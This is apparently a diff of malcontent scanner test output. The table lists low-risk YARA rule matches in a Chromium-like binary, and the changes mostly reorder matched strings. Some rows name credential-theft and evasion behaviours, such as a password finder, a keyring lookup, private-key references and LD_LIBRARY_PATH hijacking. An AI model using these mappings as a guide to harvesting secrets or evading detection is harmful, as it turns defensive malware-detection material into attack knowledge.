[get password](https://github.com/search?q=get+password&type=code)
[new-password](https://github.com/search?q=new-password&type=code)
[passwordChar](https://github.com/search?q=passwordChar&type=code)
[passwordEdit](https://github.com/search?q=passwordEdit&type=code)
[readPassword](https://github.com/search?q=readPassword&type=code)
[set password](https://github.com/search?q=set+password&type=code)
[userPassword](https://github.com/search?q=userPassword&type=code)
[PasswordH](https://github.com/search?q=PasswordH&type=code)
[bPassword](https://github.com/search?q=bPassword&type=code) | | LOW | [credential/password/finder](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password_finder.yara#gnome_keyring_sync) | gnome keyring sync | [gnome_keyring_find_password_sync](https://github.com/search?q=gnome_keyring_find_password_sync&type=code) | -| LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [PRIVATE_KEY](https://github.com/search?q=PRIVATE_KEY&type=code)
[privateKey](https://github.com/search?q=privateKey&type=code)
[private_key](https://github.com/search?q=private_key&type=code) | -| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code)
[crypto/aes](https://github.com/search?q=crypto%2Faes&type=code) | -| LOW | [crypto/decrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/decrypt.yara#decrypt) | decrypts data | [AeadEncryptDecrypt](https://github.com/search?q=AeadEncryptDecrypt&type=code)
[AesCbcEncryptDecrypt](https://github.com/search?q=AesCbcEncryptDecrypt&type=code)
[CommonEncryptDecrypt](https://github.com/search?q=CommonEncryptDecrypt&type=code)
[ContentDecryptionModuleClient](https://github.com/search?q=ContentDecryptionModuleClient&type=code)
[CreateContentDecryptionModule](https://github.com/search?q=CreateContentDecryptionModule&type=code)
[Creation of DecryptConfig failed](https://github.com/search?q=Creation+of+DecryptConfig+failed&type=code)
[DecryptAndDecodeAudio](https://github.com/search?q=DecryptAndDecodeAudio&type=code)
[DecryptAndDecodeVideo](https://github.com/search?q=DecryptAndDecodeVideo&type=code)
[DecryptPendingBuffer](https://github.com/search?q=DecryptPendingBuffer&type=code)
[Decrypted a 0](https://github.com/search?q=Decrypted+a+0&type=code)
[DecryptingAudioDecoder](https://github.com/search?q=DecryptingAudioDecoder&type=code)
[DecryptingVideoDecoder](https://github.com/search?q=DecryptingVideoDecoder&type=code)
[Decryption failed](https://github.com/search?q=Decryption+failed&type=code)
[Decryption is not avail](https://github.com/search?q=Decryption+is+not+avail&type=code)
[DoDecryptReply](https://github.com/search?q=DoDecryptReply&type=code)
[For a Content Decryption Module](https://github.com/search?q=For+a+Content+Decryption+Module&type=code)
[GetFrameDecryptor](https://github.com/search?q=GetFrameDecryptor&type=code)
[Hardware Secure Decryption is disabled](https://github.com/search?q=Hardware+Secure+Decryption+is+disabled&type=code)
[HardwareSecureDecryptionExperiment](https://github.com/search?q=HardwareSecureDecryptionExperiment&type=code)
[MojoDecryptorService](https://github.com/search?q=MojoDecryptorService&type=code)
[Selected DecryptingDemuxerStream](https://github.com/search?q=Selected+DecryptingDemuxerStream&type=code)
[Setting FrameDecryptor](https://github.com/search?q=Setting+FrameDecryptor&type=code)
[WaitingForDecryptionKey](https://github.com/search?q=WaitingForDecryptionKey&type=code)
[_privateDecrypt](https://github.com/search?q=_privateDecrypt&type=code)
[_publicDecrypt](https://github.com/search?q=_publicDecrypt&type=code)
[ause of SetFrameDecryptor](https://github.com/search?q=ause+of+SetFrameDecryptor&type=code)
[const privateDecrypt](https://github.com/search?q=const+privateDecrypt&type=code)
[const publicDecrypt](https://github.com/search?q=const+publicDecrypt&type=code)
[e to set ContentDecryptionModule object](https://github.com/search?q=e+to+set+ContentDecryptionModule+object&type=code)
[existing ContentDecryptionModule object](https://github.com/search?q=existing+ContentDecryptionModule+object&type=code)
[kDecryptError](https://github.com/search?q=kDecryptError&type=code)
[kIsAudioDecryptingDemuxerStream](https://github.com/search?q=kIsAudioDecryptingDemuxerStream&type=code)
[kIsVideoDecryptingDemuxerStream](https://github.com/search?q=kIsVideoDecryptingDemuxerStream&type=code)
[kWebCryptoCipherDecrypt](https://github.com/search?q=kWebCryptoCipherDecrypt&type=code)
[ketsReceivedWithDecrypter](https://github.com/search?q=ketsReceivedWithDecrypter&type=code) | +| LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [PRIVATE_KEY](https://github.com/search?q=PRIVATE_KEY&type=code)
[private_key](https://github.com/search?q=private_key&type=code)
[privateKey](https://github.com/search?q=privateKey&type=code) | +| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [crypto/aes](https://github.com/search?q=crypto%2Faes&type=code)
[AES](https://github.com/search?q=AES&type=code) | +| LOW | [crypto/decrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/decrypt.yara#decrypt) | decrypts data | [e to set ContentDecryptionModule object](https://github.com/search?q=e+to+set+ContentDecryptionModule+object&type=code)
[existing ContentDecryptionModule object](https://github.com/search?q=existing+ContentDecryptionModule+object&type=code)
[Hardware Secure Decryption is disabled](https://github.com/search?q=Hardware+Secure+Decryption+is+disabled&type=code)
[HardwareSecureDecryptionExperiment](https://github.com/search?q=HardwareSecureDecryptionExperiment&type=code)
[Creation of DecryptConfig failed](https://github.com/search?q=Creation+of+DecryptConfig+failed&type=code)
[Selected DecryptingDemuxerStream](https://github.com/search?q=Selected+DecryptingDemuxerStream&type=code)
[For a Content Decryption Module](https://github.com/search?q=For+a+Content+Decryption+Module&type=code)
[kIsAudioDecryptingDemuxerStream](https://github.com/search?q=kIsAudioDecryptingDemuxerStream&type=code)
[kIsVideoDecryptingDemuxerStream](https://github.com/search?q=kIsVideoDecryptingDemuxerStream&type=code)
[ContentDecryptionModuleClient](https://github.com/search?q=ContentDecryptionModuleClient&type=code)
[CreateContentDecryptionModule](https://github.com/search?q=CreateContentDecryptionModule&type=code)
[ause of SetFrameDecryptor](https://github.com/search?q=ause+of+SetFrameDecryptor&type=code)
[ketsReceivedWithDecrypter](https://github.com/search?q=ketsReceivedWithDecrypter&type=code)
[Decryption is not avail](https://github.com/search?q=Decryption+is+not+avail&type=code)
[WaitingForDecryptionKey](https://github.com/search?q=WaitingForDecryptionKey&type=code)
[kWebCryptoCipherDecrypt](https://github.com/search?q=kWebCryptoCipherDecrypt&type=code)
[DecryptingAudioDecoder](https://github.com/search?q=DecryptingAudioDecoder&type=code)
[DecryptingVideoDecoder](https://github.com/search?q=DecryptingVideoDecoder&type=code)
[Setting FrameDecryptor](https://github.com/search?q=Setting+FrameDecryptor&type=code)
[DecryptAndDecodeAudio](https://github.com/search?q=DecryptAndDecodeAudio&type=code)
[DecryptAndDecodeVideo](https://github.com/search?q=DecryptAndDecodeVideo&type=code)
[AesCbcEncryptDecrypt](https://github.com/search?q=AesCbcEncryptDecrypt&type=code)
[CommonEncryptDecrypt](https://github.com/search?q=CommonEncryptDecrypt&type=code)
[DecryptPendingBuffer](https://github.com/search?q=DecryptPendingBuffer&type=code)
[MojoDecryptorService](https://github.com/search?q=MojoDecryptorService&type=code)
[const privateDecrypt](https://github.com/search?q=const+privateDecrypt&type=code)
[const publicDecrypt](https://github.com/search?q=const+publicDecrypt&type=code)
[AeadEncryptDecrypt](https://github.com/search?q=AeadEncryptDecrypt&type=code)
[Decryption failed](https://github.com/search?q=Decryption+failed&type=code)
[GetFrameDecryptor](https://github.com/search?q=GetFrameDecryptor&type=code)
[_privateDecrypt](https://github.com/search?q=_privateDecrypt&type=code)
[DoDecryptReply](https://github.com/search?q=DoDecryptReply&type=code)
[_publicDecrypt](https://github.com/search?q=_publicDecrypt&type=code)
[Decrypted a 0](https://github.com/search?q=Decrypted+a+0&type=code)
[kDecryptError](https://github.com/search?q=kDecryptError&type=code) | | LOW | [crypto/ecdsa](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ecdsa.yara#crypto_ecdsa) | Uses the Go crypto/ecdsa library | [crypto/ecdsa](https://github.com/search?q=crypto%2Fecdsa&type=code) | | LOW | [crypto/ed25519](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ed25519.yara#ed25519) | Elliptic curve algorithm used by TLS and SSH | [ed25519](https://github.com/search?q=ed25519&type=code) | -| LOW | [crypto/public_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key) | references a 'public key' | [Public Key](https://github.com/search?q=Public+Key&type=code)
[Public key](https://github.com/search?q=Public+key&type=code)
[Public-key](https://github.com/search?q=Public-key&type=code)
[PublicKey](https://github.com/search?q=PublicKey&type=code)
[public key](https://github.com/search?q=public+key&type=code)
[public-key](https://github.com/search?q=public-key&type=code)
[publicKey](https://github.com/search?q=publicKey&type=code)
[public_key](https://github.com/search?q=public_key&type=code)
[publickey](https://github.com/search?q=publickey&type=code) | -| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [TLS13](https://github.com/search?q=TLS13&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code)
[require('tls')](https://github.com/search?q=require%28%27tls%27%29&type=code) | +| LOW | [crypto/public_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key) | references a 'public key' | [Public Key](https://github.com/search?q=Public+Key&type=code)
[Public key](https://github.com/search?q=Public+key&type=code)
[Public-key](https://github.com/search?q=Public-key&type=code)
[public key](https://github.com/search?q=public+key&type=code)
[public-key](https://github.com/search?q=public-key&type=code)
[public_key](https://github.com/search?q=public_key&type=code)
[PublicKey](https://github.com/search?q=PublicKey&type=code)
[publicKey](https://github.com/search?q=publicKey&type=code)
[publickey](https://github.com/search?q=publickey&type=code) | +| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [require('tls')](https://github.com/search?q=require%28%27tls%27%29&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code) | | LOW | [data/compression/bzip2](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/bzip2.yara#bzip2) | Works with bzip2 files | [bzip2](https://github.com/search?q=bzip2&type=code) | | LOW | [data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | | LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#lzma) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | @@ -120,13 +120,13 @@ | LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | | LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | -| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [ENV](https://github.com/search?q=ENV&type=code)
[USER](https://github.com/search?q=USER&type=code)
[environ](https://github.com/search?q=environ&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [getenv](https://github.com/search?q=getenv&type=code)
[HOME](https://github.com/search?q=HOME&type=code) | +| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [environ](https://github.com/search?q=environ&type=code)
[getenv](https://github.com/search?q=getenv&type=code)
[USER](https://github.com/search?q=USER&type=code)
[ENV](https://github.com/search?q=ENV&type=code) | | LOW | [evasion/hijack_execution/LD_LIBRARY_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hijack_execution/LD_LIBRARY_PATH.yara#ld_library_path) | ld library path | [LD_LIBRARY_PATH](https://github.com/search?q=LD_LIBRARY_PATH&type=code) | -| LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [LANG](https://github.com/search?q=LANG&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [getenv](https://github.com/search?q=getenv&type=code)
[LANG](https://github.com/search?q=LANG&type=code) | | LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | | LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | -| LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Chromium PDF Plugin](https://github.com/search?q=Chromium+PDF+Plugin&type=code)
[ContainsPlugins](https://github.com/search?q=ContainsPlugins&type=code)
[Failed to generate a plugin id](https://github.com/search?q=Failed+to+generate+a+plugin+id&type=code)
[GetPluginInfo](https://github.com/search?q=GetPluginInfo&type=code)
[GetPlugins](https://github.com/search?q=GetPlugins&type=code)
[If you want to block plugins](https://github.com/search?q=If+you+want+to+block+plugins&type=code)
[Is an accelerated plugin](https://github.com/search?q=Is+an+accelerated+plugin&type=code)
[LoadPluginsSoon](https://github.com/search?q=LoadPluginsSoon&type=code)
[No PPP_GetInterface in plugin library](https://github.com/search?q=No+PPP_GetInterface+in+plugin+library&type=code)
[No PPP_InitializeModule in plugin library](https://github.com/search?q=No+PPP_InitializeModule+in+plugin+library&type=code)
[OnPepperPluginCrashed](https://github.com/search?q=OnPepperPluginCrashed&type=code)
[OnPepperPluginHung](https://github.com/search?q=OnPepperPluginHung&type=code)
[OpenChannelToPepperPlugin](https://github.com/search?q=OpenChannelToPepperPlugin&type=code)
[Pepper Plugin Broker](https://github.com/search?q=Pepper+Plugin+Broker&type=code)
[PepperPluginInstance](https://github.com/search?q=PepperPluginInstance&type=code)
[Plugin Changed](https://github.com/search?q=Plugin+Changed&type=code)
[Plugin URL](https://github.com/search?q=Plugin+URL&type=code)
[Plugin doesn](https://github.com/search?q=Plugin+doesn&type=code)
[PluginArray](https://github.com/search?q=PluginArray&type=code)
[PluginContextSecurity](https://github.com/search?q=PluginContextSecurity&type=code)
[PluginData](https://github.com/search?q=PluginData&type=code)
[PluginDispatcher](https://github.com/search?q=PluginDispatcher&type=code)
[PluginLoad](https://github.com/search?q=PluginLoad&type=code)
[PluginPrivate](https://github.com/search?q=PluginPrivate&type=code)
[PluginRegistry](https://github.com/search?q=PluginRegistry&type=code)
[PluginResource](https://github.com/search?q=PluginResource&type=code)
[PluginService](https://github.com/search?q=PluginService&type=code)
[PluginSizeUpdated](https://github.com/search?q=PluginSizeUpdated&type=code)
[PpapiMsg_LoadPlugin](https://github.com/search?q=PpapiMsg_LoadPlugin&type=code)
[PpapiPluginMain](https://github.com/search?q=PpapiPluginMain&type=code)
[PpapiPluginMetrics](https://github.com/search?q=PpapiPluginMetrics&type=code)
[RemoveBrowserPluginEmbedder](https://github.com/search?q=RemoveBrowserPluginEmbedder&type=code)
[SendToPlugin](https://github.com/search?q=SendToPlugin&type=code)
[SetBrowserPluginGuest](https://github.com/search?q=SetBrowserPluginGuest&type=code)
[The plugin has not](https://github.com/search?q=The+plugin+has+not&type=code)
[Unable to create ppapi plugin process](https://github.com/search?q=Unable+to+create+ppapi+plugin+process&type=code)
[Unable to load plugin](https://github.com/search?q=Unable+to+load+plugin&type=code)
[Unable to load ppapi plugin](https://github.com/search?q=Unable+to+load+ppapi+plugin&type=code)
[allowNonEmptyNavigatorPlugins](https://github.com/search?q=allowNonEmptyNavigatorPlugins&type=code)
[as a plugin](https://github.com/search?q=as+a+plugin&type=code)
[browserplugin](https://github.com/search?q=browserplugin&type=code)
[enabledPlugin](https://github.com/search?q=enabledPlugin&type=code)
[html_plugin_element](https://github.com/search?q=html_plugin_element&type=code)
[kPluginObject](https://github.com/search?q=kPluginObject&type=code)
[loadplugin](https://github.com/search?q=loadplugin&type=code)
[of theremnants ofpluginspage](https://github.com/search?q=of+theremnants+ofpluginspage&type=code)
[page contains plugins](https://github.com/search?q=page+contains+plugins&type=code)
[pdf_internal_plugin_wrapper](https://github.com/search?q=pdf_internal_plugin_wrapper&type=code)
[pdf_view_plugin_base](https://github.com/search?q=pdf_view_plugin_base&type=code)
[pdf_view_web_plugin](https://github.com/search?q=pdf_view_web_plugin&type=code)
[pepper_hung_plugin_filter](https://github.com/search?q=pepper_hung_plugin_filter&type=code)
[pepper_webplugin_impl](https://github.com/search?q=pepper_webplugin_impl&type=code)
[plugin data](https://github.com/search?q=plugin+data&type=code)
[pluginObject](https://github.com/search?q=pluginObject&type=code)
[plugin_audio_thread](https://github.com/search?q=plugin_audio_thread&type=code)
[plugin_container_impl](https://github.com/search?q=plugin_container_impl&type=code)
[plugin_instance_impl](https://github.com/search?q=plugin_instance_impl&type=code)
[plugin_message_filter](https://github.com/search?q=plugin_message_filter&type=code)
[plugin_module](https://github.com/search?q=plugin_module&type=code)
[plugin_private_storage](https://github.com/search?q=plugin_private_storage&type=code)
[plugin_process_host](https://github.com/search?q=plugin_process_host&type=code)
[plugin_service_impl](https://github.com/search?q=plugin_service_impl&type=code)
[pluginprH](https://github.com/search?q=pluginprH&type=code)
[pluginsEnabled](https://github.com/search?q=pluginsEnabled&type=code)
[pluginspace](https://github.com/search?q=pluginspace&type=code)
[pluginswithin](https://github.com/search?q=pluginswithin&type=code)
[pluginurl](https://github.com/search?q=pluginurl&type=code)
[ppapi_plugin_main](https://github.com/search?q=ppapi_plugin_main&type=code)
[ppapi_plugin_process](https://github.com/search?q=ppapi_plugin_process&type=code)
[r PluginH](https://github.com/search?q=r+PluginH&type=code)
[relativebringingincreasegovernorplugins](https://github.com/search?q=relativebringingincreasegovernorplugins&type=code)
[security origin than your plugin](https://github.com/search?q=security+origin+than+your+plugin&type=code)
[strictMixedContentCheckingForPlugin](https://github.com/search?q=strictMixedContentCheckingForPlugin&type=code)
[suggestplugin](https://github.com/search?q=suggestplugin&type=code) | +| LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [No PPP_InitializeModule in plugin library](https://github.com/search?q=No+PPP_InitializeModule+in+plugin+library&type=code)
[relativebringingincreasegovernorplugins](https://github.com/search?q=relativebringingincreasegovernorplugins&type=code)
[No PPP_GetInterface in plugin library](https://github.com/search?q=No+PPP_GetInterface+in+plugin+library&type=code)
[Unable to create ppapi plugin process](https://github.com/search?q=Unable+to+create+ppapi+plugin+process&type=code)
[strictMixedContentCheckingForPlugin](https://github.com/search?q=strictMixedContentCheckingForPlugin&type=code)
[security origin than your plugin](https://github.com/search?q=security+origin+than+your+plugin&type=code)
[Failed to generate a plugin id](https://github.com/search?q=Failed+to+generate+a+plugin+id&type=code)
[allowNonEmptyNavigatorPlugins](https://github.com/search?q=allowNonEmptyNavigatorPlugins&type=code)
[If you want to block plugins](https://github.com/search?q=If+you+want+to+block+plugins&type=code)
[of theremnants ofpluginspage](https://github.com/search?q=of+theremnants+ofpluginspage&type=code)
[RemoveBrowserPluginEmbedder](https://github.com/search?q=RemoveBrowserPluginEmbedder&type=code)
[Unable to load ppapi plugin](https://github.com/search?q=Unable+to+load+ppapi+plugin&type=code)
[pdf_internal_plugin_wrapper](https://github.com/search?q=pdf_internal_plugin_wrapper&type=code)
[OpenChannelToPepperPlugin](https://github.com/search?q=OpenChannelToPepperPlugin&type=code)
[pepper_hung_plugin_filter](https://github.com/search?q=pepper_hung_plugin_filter&type=code)
[Is an accelerated plugin](https://github.com/search?q=Is+an+accelerated+plugin&type=code)
[plugin_private_storage](https://github.com/search?q=plugin_private_storage&type=code)
[OnPepperPluginCrashed](https://github.com/search?q=OnPepperPluginCrashed&type=code)
[PluginContextSecurity](https://github.com/search?q=PluginContextSecurity&type=code)
[SetBrowserPluginGuest](https://github.com/search?q=SetBrowserPluginGuest&type=code)
[Unable to load plugin](https://github.com/search?q=Unable+to+load+plugin&type=code)
[page contains plugins](https://github.com/search?q=page+contains+plugins&type=code)
[pepper_webplugin_impl](https://github.com/search?q=pepper_webplugin_impl&type=code)
[plugin_container_impl](https://github.com/search?q=plugin_container_impl&type=code)
[plugin_message_filter](https://github.com/search?q=plugin_message_filter&type=code)
[Pepper Plugin Broker](https://github.com/search?q=Pepper+Plugin+Broker&type=code)
[PepperPluginInstance](https://github.com/search?q=PepperPluginInstance&type=code)
[pdf_view_plugin_base](https://github.com/search?q=pdf_view_plugin_base&type=code)
[plugin_instance_impl](https://github.com/search?q=plugin_instance_impl&type=code)
[ppapi_plugin_process](https://github.com/search?q=ppapi_plugin_process&type=code)
[Chromium PDF Plugin](https://github.com/search?q=Chromium+PDF+Plugin&type=code)
[PpapiMsg_LoadPlugin](https://github.com/search?q=PpapiMsg_LoadPlugin&type=code)
[html_plugin_element](https://github.com/search?q=html_plugin_element&type=code)
[pdf_view_web_plugin](https://github.com/search?q=pdf_view_web_plugin&type=code)
[plugin_audio_thread](https://github.com/search?q=plugin_audio_thread&type=code)
[plugin_process_host](https://github.com/search?q=plugin_process_host&type=code)
[plugin_service_impl](https://github.com/search?q=plugin_service_impl&type=code)
[OnPepperPluginHung](https://github.com/search?q=OnPepperPluginHung&type=code)
[PpapiPluginMetrics](https://github.com/search?q=PpapiPluginMetrics&type=code)
[The plugin has not](https://github.com/search?q=The+plugin+has+not&type=code)
[PluginSizeUpdated](https://github.com/search?q=PluginSizeUpdated&type=code)
[ppapi_plugin_main](https://github.com/search?q=ppapi_plugin_main&type=code)
[PluginDispatcher](https://github.com/search?q=PluginDispatcher&type=code)
[ContainsPlugins](https://github.com/search?q=ContainsPlugins&type=code)
[LoadPluginsSoon](https://github.com/search?q=LoadPluginsSoon&type=code)
[PpapiPluginMain](https://github.com/search?q=PpapiPluginMain&type=code)
[Plugin Changed](https://github.com/search?q=Plugin+Changed&type=code)
[PluginRegistry](https://github.com/search?q=PluginRegistry&type=code)
[PluginResource](https://github.com/search?q=PluginResource&type=code)
[pluginsEnabled](https://github.com/search?q=pluginsEnabled&type=code)
[GetPluginInfo](https://github.com/search?q=GetPluginInfo&type=code)
[PluginPrivate](https://github.com/search?q=PluginPrivate&type=code)
[PluginService](https://github.com/search?q=PluginService&type=code)
[browserplugin](https://github.com/search?q=browserplugin&type=code)
[enabledPlugin](https://github.com/search?q=enabledPlugin&type=code)
[kPluginObject](https://github.com/search?q=kPluginObject&type=code)
[plugin_module](https://github.com/search?q=plugin_module&type=code)
[pluginswithin](https://github.com/search?q=pluginswithin&type=code)
[suggestplugin](https://github.com/search?q=suggestplugin&type=code)
[Plugin doesn](https://github.com/search?q=Plugin+doesn&type=code)
[SendToPlugin](https://github.com/search?q=SendToPlugin&type=code)
[pluginObject](https://github.com/search?q=pluginObject&type=code)
[PluginArray](https://github.com/search?q=PluginArray&type=code)
[as a plugin](https://github.com/search?q=as+a+plugin&type=code)
[plugin data](https://github.com/search?q=plugin+data&type=code)
[pluginspace](https://github.com/search?q=pluginspace&type=code)
[GetPlugins](https://github.com/search?q=GetPlugins&type=code)
[Plugin URL](https://github.com/search?q=Plugin+URL&type=code)
[PluginData](https://github.com/search?q=PluginData&type=code)
[PluginLoad](https://github.com/search?q=PluginLoad&type=code)
[loadplugin](https://github.com/search?q=loadplugin&type=code)
[pluginprH](https://github.com/search?q=pluginprH&type=code)
[pluginurl](https://github.com/search?q=pluginurl&type=code)
[r PluginH](https://github.com/search?q=r+PluginH&type=code) | | LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | | LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [CreateDirectoryAndGetEr](https://github.com/search?q=CreateDirectoryAndGetEr&type=code)
[CreateDirectoryResult](https://github.com/search?q=CreateDirectoryResult&type=code)
[createFolder](https://github.com/search?q=createFolder&type=code)
[mkdir](https://github.com/search?q=mkdir&type=code) | @@ -135,23 +135,23 @@ | LOW | [fs/file/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#py_open) | opens files | [open(](https://github.com/search?q=open%28&type=code) | | LOW | [fs/file/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-read.yara#go_file_read) | reads files | [ReadFile](https://github.com/search?q=ReadFile&type=code) | | LOW | [fs/file/rename](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-rename.yara#explicit_rename) | renames files | [MoveFile](https://github.com/search?q=MoveFile&type=code) | -| LOW | [fs/file/stat](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-stat.yara#npm_stat) | access filesystem metadata | [fs.stat(base](https://github.com/search?q=fs.stat%28base&type=code)
[fs.statSync(file)](https://github.com/search?q=fs.statSync%28file%29&type=code) | +| LOW | [fs/file/stat](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-stat.yara#npm_stat) | access filesystem metadata | [fs.statSync(file)](https://github.com/search?q=fs.statSync%28file%29&type=code)
[fs.stat(base](https://github.com/search?q=fs.stat%28base&type=code) | | LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | -| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [WriteFile](https://github.com/search?q=WriteFile&type=code)
[writeFileHandle](https://github.com/search?q=writeFileHandle&type=code)
[writeFileSync](https://github.com/search?q=writeFileSync&type=code)
[writeIntoFile](https://github.com/search?q=writeIntoFile&type=code)
[writeToFile](https://github.com/search?q=writeToFile&type=code) | +| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [writeFileHandle](https://github.com/search?q=writeFileHandle&type=code)
[writeFileSync](https://github.com/search?q=writeFileSync&type=code)
[writeIntoFile](https://github.com/search?q=writeIntoFile&type=code)
[writeToFile](https://github.com/search?q=writeToFile&type=code)
[WriteFile](https://github.com/search?q=WriteFile&type=code) | | LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | | LOW | [fs/lock_update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | -| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [-o](https://github.com/search?q=-o&type=code)
[mount](https://github.com/search?q=mount&type=code) | -| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/asound.conf](https://github.com/search?q=%2Fetc%2Fasound.conf&type=code)
[/etc/ati/amdpcsdb.default](https://github.com/search?q=%2Fetc%2Fati%2Famdpcsdb.default&type=code)
[/etc/catalog](https://github.com/search?q=%2Fetc%2Fcatalog&type=code)
[/etc/chromium/native-messaging-hosts](https://github.com/search?q=%2Fetc%2Fchromium%2Fnative-messaging-hosts&type=code)
[/etc/chromium/policies](https://github.com/search?q=%2Fetc%2Fchromium%2Fpolicies&type=code)
